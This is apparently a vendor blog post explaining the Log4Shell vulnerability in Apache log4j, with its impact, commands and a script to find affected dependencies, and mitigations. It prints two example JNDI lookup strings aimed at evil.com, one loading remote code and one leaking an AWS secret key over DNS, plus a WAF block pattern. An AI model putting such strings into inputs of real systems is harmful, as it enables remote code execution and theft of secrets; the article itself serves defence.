Log4Shell Explained

This article discusses the background, impact, identification, and mitigation of Log4Shell, one of the worst vulnerabilities to arise in the past decade. Here at Cloudsmith, security and privacy are paramount. As a hosted package management service helping customers distribute millions of packages worldwide, we're part of the story for securing software supply chains. Read on further to learn what log4shell is, see how the log4shell vulnerability works and what you can do to protect yourself and your users.

What is Log4Shell?

The log4j library, part of the Apache Software Foundation (ASF), is a general and commonly utilized logging framework used by Java developers worldwide. The framework allows developers to log data (including user-sourced information) in their applications.

On 10th December 2021, a critical severity Remote Code Execution (RCE) exploit disclosure log4j was published as CVE-2021-44228, affecting versions below 2.15.0. The vulnerability was coined Log4Shell to imply that exploiting it resulted in a shell (login) on a server.

Due to the widespread deployment of Java applications log4j, many sources have characterized the exploit as one of the most impactful last decade. For example, Tenable described it as the "single biggest, most critical vulnerability of the last decade".

Before disclosure as CVE-2021-44228, the exploit entered the collective mind space of developers everywhere as a Minecraft-specific attack, utilizing crafted strings to execute code on the Minecraft server. As shown in the following tweet, dated 9th December 2021:

However, as hinted in the above tweet, it was suspected at the time that the extent of the impact had far-reaching consequences beyond Minecraft alone. Then, following disclosure, CVE-2021-44228 confirmed the alleged impact on servers and services worldwide.

As stated in a tweet by Matthew Prince, CEO of Cloudflare, they found evidence to suggest that the earliest known attacks seen by them started on 1st December 2021. The evidence indicates that it was "in the wild" for at least nine days before the public CVE disclosure.

Since the disclosure, some of the major enterprises that have been affected by this include Apple, Amazon, Cloudflare, Steam, Tesla, Twitter, and Baidu. Therefore, the possibility is high, regardless of whether you are directly impacted or not, that someone in your supply chain potentially is or has been already.

Just how bad is the log4j exploit?

Extremely bad, or instead, as bad as possible (or perhaps, even worse). The exploit affects log4J versions below 2.15.0, disclosed as CVE-2021-44228 and referred to as Log4Shell. Apache assigned a Common Vulnerability Scoring System (CVSS) score of 10 (the highest available) because the exploit enables both full Remote Code Execution (RCE) and data exfiltration.

Given specially crafted strings, log4j below version 2.15.0 performs network-based lookups of objects from URLs using the Java Naming and Directory Interface (JDNI). One of the supported protocols is the Lightweight Directory Access Protocol (LDAP), which can retrieve data from arbitrary URLs for evaluation and execution, either local to the server or remotely.

In its default configuration, log4j will perform string interpolation (substitution) for special lookup variables in the form of ${<prefix>:<data>}, such as replacing ${date:yyyy-MM-dd} with the date 2021-12-10. Using the JNDI, with an expression such as ${jndi:ldap://evil.com/bad/payload}, it then becomes possible to load and execute arbitrary code from evil.com/bad/payload.

The Naked Security by Sophos blog provides an example of this. They use ncat (a well-known networking utility) to open a listening socket that reflects data to an exploitable server. If the data returned is also well-crafted JNDI data, then it will be evaluated as code executed in the context of the application's environment. Visualization provided by the Juniper Threat Labs blog shows the workflow in practice:

The result of the above code execution is that attackers can run any piece of arbitrary code that they choose. It will run in the same context as your application, enjoying all of the same access and privileges. The practical (but malicious) outcomes are almost limitless, from the "simple" database dumps, login shells, botnets, unsolicited spam, etc., through to the dangerous (e.g. targetting public infrastructure).

Beyond the use of JNDI LDAP, additional protocols may be subject to exploitation, such as Java Remote Method Invocation (RMI), the well-known Domain Name System (DNS), and the Internet Inter-ORB Protocol (IIOP), etc. Juniper confirmed this by reporting a shift in JNDI LDAP to RMI attacks, resulting in more sophisticated payloads. So the risk remains high.

Although a setting can mitigate code execution, it is shown by Daniel Miessler of Unsupervised Learning still possible to exfiltrate data with other techniques, such as interpolation into DNS lookups. For example, the expression ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.evil.com}, if evaluated, will exfiltrate the contents of the AWS_SECRET_ACCESS_KEY environment variable.

Therefore, despite the assistance of mitigations other than version upgrades, such as implementing rules in Web Application Firewalls (WAFs), disabling JNDI URL-based lookups, or even controlling egress from servers, there is still a considerable risk of impact. The best mitigation route is to upgrade dependencies, shut down (block) installations of impacted log4j versions, and examine servers for existing exploitation.

In summary, the reason that log4j was assigned a CVSS rating of 10 (again, the highest possible) is that:

The log4j library is highly commonly used and widespread in the Java community.
The attack enables Remote Code Execution in the context of servers and applications.
It also allows data exfiltration, in which bad actors can steal server-side secrets.
It is reasonably easy to exploit, with little practical knowledge required to do so.
Mitigations other than version upgrades (which aren't always easy) don't fully protect.
Therefore, the attack surface area is unfathomably large and carries a similar impact.

So yes, as stated by others in the community, this vulnerability is one of the most significant and most impactful ever seen. As stated by Sophos, it is (sadly) ironic that the data being logged is probably for auditing or security purposes. However, now is the time to do everything in our collective power to protect our servers, applications, users, businesses, and even our entire ecosystem.

It's a tough ask, but we're here to help.

What else do I need to know?

Patches for log4j have been released to mitigate the vulnerability, in the form of the 2.15.0 (initially) then 2.16.0 and 2.17.0 releases.

However, 2.15.0 and 2.16.0 have known Denial of Service [DoS] vulnerabilities, cited in CVE-2021-45046 and CVE-2021-45105. Therefore, the current (as of 21st December 2021) recommendation for mitigation is to update log4j dependencies to at least version 2.17.0.

How can I identify affected packages?

In all use-cases, identification of affected software will involve examining packages for dependencies on log4j with the following attributes (expressed in terms of Maven-based GAV coordinates):

GroupID: org.apache.logging.log4j
ArtifactID: log4j* (or more specifically, log4j-core)
Version: Generally below 2.17.0 (but specifically for CVE-2021-44228, below 2.15.0)

Identification For Maven Users

You can use the Maven Dependency plugin to locate local software packages' direct and transitive dependencies. For example, you can filter the dependency tree find log4j usage:

$ mvn dependency:tree -Dincludes=org.apache.logging.log4j

Which will output something like:

[INFO] [dependency:tree] [INFO] com.yourcompany.aggregator:aggregator-plugin:2.0.5 [INFO] \- org.apache.logging.log4j:log4j:jar:2.14.1

Identification For Cloudsmith Users

We released additional functionality to search for dependencies such as log4j across packages stored within Cloudsmith repositories. The syntax is dependency:<name>, so to search for log4j dependencies, you specify dependency:log4j. The functionality is available via the UI, the API and the CLI.

For example, you can search via the CLI using:

$ cloudsmith ls packages {account}/{repo} -q "dependency:log4jGetting list of packages ... OK Name | Version | Status | Owner / Repository (Identifier) spring-boot-starter-log4j2 | 2.6.1 | Completed | you/your-repo/URjuLZOWzKjW Results: 1-1 (1) of 1 package visible (page: 1/1, page size: 30)

The above only tells you which packages have a direct/non-transitive dependency on log4j, it doesn't (yet) allow a search on versions (note: concrete versions are not always known in a repository). However, if you're utilizing Cloudsmith as a proper Single Source of Truth, and store all packages that your applications utilize, then it is possible to detect all uses of log4j (because it will be visible across all packages used).

Using the new package dependencies API, you can confirm the versions of those dependencies. The functionality is also available via the latest Cloudsmith CLI release, 0.31.1, which includes a new dependencies sub-command that can be used to list dependencies for a package. For example, using the "identifier" for the package from above:

$ cloudsmith deps your-account/your-repo/URjuLZOWzKjWGetting direct (non-transitive) dependencies of URjuLZOWzKjW in your-account/your-repo ... OK Type | Name | Operator | Version Compile | org.apache.logging.log4j:log4j-core | >= | 2.14.1 Compile | org.apache.logging.log4j:log4j-jul | >= | 2.14.1 Compile | org.apache.logging.log4j:log4j-slf4j-impl | >= | 2.14.1 Compile | org.slf4j:jul-to-slf4j | >= | 1.7.32 Results: 4 direct dependencies

You can always use a combination of these commands and the -F json (format as JSON) flag for scripting calls. So, for example, you could use the ls (list) command from the CLI to find packages that depend upon log4j and then the deps (dependencies) command to get the details.

For example, you can use the following (albeit, Linux-y) script to automate the generation of a Comma-Separated Value (CSV) report (disclaimer: this is a little hacked together, but should serve to demonstrate the point; if you get stuck, let us help you):

#/bin/bash # list_log4j_deps.sh <account> [optional args] account=$1 args=${2:-""} echo "account,repository,package,dependency,operator,version" while IFS= read -r repository; do while IFS= read -r identifier; do p="$account,$repository,$identifier" cloudsmith deps $account/$repository/$identifier -F json $args 2>/dev/null \ | jq -r ".data[] | \"$p,\" + .name + \",\" + .operator + \",\" + .version" \ | grep log4j done < <( cloudsmith ls pkg $account/$repository -q 'dependency:log4j' \ -F json $args 2>/dev/null | jq -r ".data[] | .slug_perm" ) done < <( cloudsmith ls repo $account -F json $args 2>/dev/null | jq -r ".data[] | .slug" )

Which will result in something like:

$ bash list_log4j_deps.sh your-accountaccount,repository,package,dependency,operator,version your-account,repo,URjuLZOWzKjW,org.apache.logging.log4j:log4j-core,>=,2.14.1 your-account,repo,URjuLZOWzKjW,org.apache.logging.log4j:log4j-jul,>=,2.14.1 your-account,repo,URjuLZOWzKjW,org.apache.logging.log4j:log4j-slf4j-impl,>=,2.14.1

Finally, if you're looking to automate the scripting but don't want to use the Python-based Cloudsmith CLI, you can also achieve the same result by executing queries against the Cloudsmith APIs.

How can I prevent installs of `log4j`?

For Cloudsmith users, a recently added feature of repositories is to prevent install for impacted versions of log4j. The blocking functionality is currently a bespoke feature that will (eventually) metamorph into a more generalized quarantine/risk/controls feature, for now, services log4j only. You can enable block in any Cloudsmith repository on the settings page. It looks like:

As stated, this functionality will: automatically block log4j-related downloads unless they meet a specific version constraint. The blocking applies to both local (cached) and upstream packages. A package is considered related to log4j if the GroupID is org.apache.logging.log4j and the ArtifactID contains log4j (e.g. log4j-core).

How can I mitigate the Log4Shell vulnerability?

Primarily, by following the mitigation advice given by Apache:

Identify applications utilizing log4j dependencies below 2.15.0 (as above).
Upgrade log4j dependencies to at least version 2.17.0 (2.15.0 and 2.16.0 have known Denial of Service [DoS] vulnerabilities, cited in CVE-2021-45046 and CVE-2021-45105, so the recommendation by Apache is to use 2.17.0 and above.).

If you're unable to update dependencies, you can also utilize the following mitigations (but bear in mind that the primary mitigation is still to upgrade dependencies, and these are not foolproof either, as demonstrated above re: Daniel Miessler of Unsupervised Learning):

You can mitigate the issue for applications that use log4j above/equal to 2.10 by setting system property log4j2.formatMsgNoLookups or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For example:
Via property: java -Dlog4j2.formatMsgNoLookups=true ...
Via environment: LOG4J_FORMAT_MSG_NO_LOOKUPS=true java ...
For applications that use log4j between >=2.7 and <=2.14.1, you can mitigate by removing org/apache/logging/log4j/core/lookup/JndiLookup.class from the classpath. For example:
By executing: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

In addition to those, there are also additional techniques available to reduce the exploit potential:

For applications behind a Web Application Firewall (WAF), your provider may have (or will be releasing) additional rules to prevent exploration. The idea is to block requests containing $jndi:ldap:// (although it won't be foolproof). For example, AWS has updated its WAF ruleset AWSManagedRulesKnownBadInputsRuleSet to include dynamic prevention.
It may also be possible to mitigate exploits by blocking egress/outbound connections destined for LDAP or RMI or any type of traffic other than necessary. However, this might not prevent all kinds of attacks. The JNDI interface supports multiple protocols, and even executing a DNS lookup can leak information.

Summary

The log4j vulnerability is a critical security risk that can lead to Remote Code Execution (RCE) and, as such, should not be taken lightly. Due to the widespread use log4j across many enterprises, projects, and organizations, the blast radius is one of the largest ever seen.

You should take all steps necessary to mitigate this vulnerability as quickly as possible, and we empathize with all those affected by it. It's another reminder of how critical software supply chain security is and how great the exposure can be when a critical exploit emerges in the wild.

If you have any questions about the exploit, need any additional help with identification or mitigation, or have any general concerns, please don't hesitate to contact us. As previously mentioned, this is a bad one, so #hugops to all involved worldwide.

Learn more

Please visit the following resources to learn more about Log4Shell:

Next Steps with Cloudsmith

If you're not currently with Cloudsmith, it's easy to take the next step. You can start a free trial immediately and spin up a repository within 60 seconds, or contact us to set up a no-fuss demo session with our team.

Cloudsmith is the most cloud-native, universal package management service on the planet, but don't just take our word for it. Join us and take back control of your software supply chain today!

All About Log4j/Log4Shell + Mitigation (CVE-2021-44228 and Beyond)